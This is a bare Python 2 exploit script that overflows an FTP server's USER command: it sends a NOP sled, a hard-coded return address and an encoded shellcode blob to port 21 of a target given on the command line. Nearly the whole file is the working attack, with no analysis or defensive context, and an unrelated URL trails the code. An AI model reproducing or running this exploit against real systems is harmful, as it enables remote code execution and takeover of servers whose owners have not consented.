import sys,socket
target = sys.argv[1]
shellcode = ("\x6a\x4f\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfe\x1f"
"\xf6\x02\x83\xeb\xfc\xe2\xf4\x02\xf7\x7f\x02\xfe\x1f\x96\x8b"
"\x1b\x2e\x24\x66\x75\x4d\xc6\x89\xac\x13\x7d\x50\xea\x94\x84"
"\x2a\xf1\xa8\xbc\x24\xcf\xe0\xc7\xc2\x52\x23\x97\x7e\xfc\x33"
"\xd6\xc3\x31\x12\xf7\xc5\x1c\xef\xa4\x55\x75\x4d\xe6\x89\xbc"
"\x23\xf7\xd2\x75\x5f\x8e\x87\x3e\x6b\xbc\x03\x2e\x4f\x7d\x4a"
"\xe6\x94\xae\x22\xff\xcc\x15\x3e\xb7\x94\xc2\x89\xff\xc9\xc7"
"\xfd\xcf\xdf\x5a\xc3\x31\x12\xf7\xc5\xc6\xff\x83\xf6\xfd\x62"
"\x0e\x39\x83\x3b\x83\xe0\xa6\x94\xae\x26\xff\xcc\x90\x89\xf2"
"\x54\x7d\x5a\xe2\x1e\x25\x89\xfa\x94\xf7\xd2\x77\x5b\xd2\x26"
"\xa5\x44\x97\x5b\xa4\x4e\x09\xe2\xa6\x40\xac\x89\xec\xf4\x70"
"\x5f\x96\x2c\xc4\x02\xfe\x77\x81\x71\xcc\x40\xa2\x6a\xb2\x68"
"\xd0\x05\x01\xca\x4e\x92\xff\x1f\xf6\x2b\x3a\x4b\xa6\x6a\xd7"
"\x9f\x9d\x02\x01\xca\xa6\x52\xae\x4f\xb6\x52\xbe\x4f\x9e\xe8"
"\xf1\xc0\x16\xfd\x2b\x96\x31\x6a\x3e\xb7\x31\xb2\x96\x1d\xf6"
"\x03\x45\x96\x10\x68\xee\x49\xa1\x6a\x67\xba\x82\x63\x01\xca"
"\x9e\x61\x93\x7b\xf6\x8b\x1d\x48\xa1\x55\xcf\xe9\x9c\x10\xa7"
"\x49\x14\xff\x98\xd8\xb2\x26\xc2\x1e\xf7\x8f\xba\x3b\xe6\xc4"
"\xfe\x5b\xa2\x52\xa8\x49\xa0\x44\xa8\x51\xa0\x54\xad\x49\x9e"
"\x7b\x32\x20\x70\xfd\x2b\x96\x16\x4c\xa8\x59\x09\x32\x96\x17"
"\x71\x1f\x9e\xe0\x23\xb9\x0e\xaa\x54\x54\x96\xb9\x63\xbf\x63"
"\xe0\x23\x3e\xf8\x63\xfc\x82\x05\xff\x83\x07\x45\x58\xe5\x70"
"\x91\x75\xf6\x51\x01\xca\xf6\x02")
buff = "\x90"*230 + "\xD7\x30\x5A\x7D"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,21))
print s.recv(2048)
s.send("USER "+buff+'\x90'*15+shellcode+"\r\n")
s.close()
http://www.hiry.cn/a/sichuantechan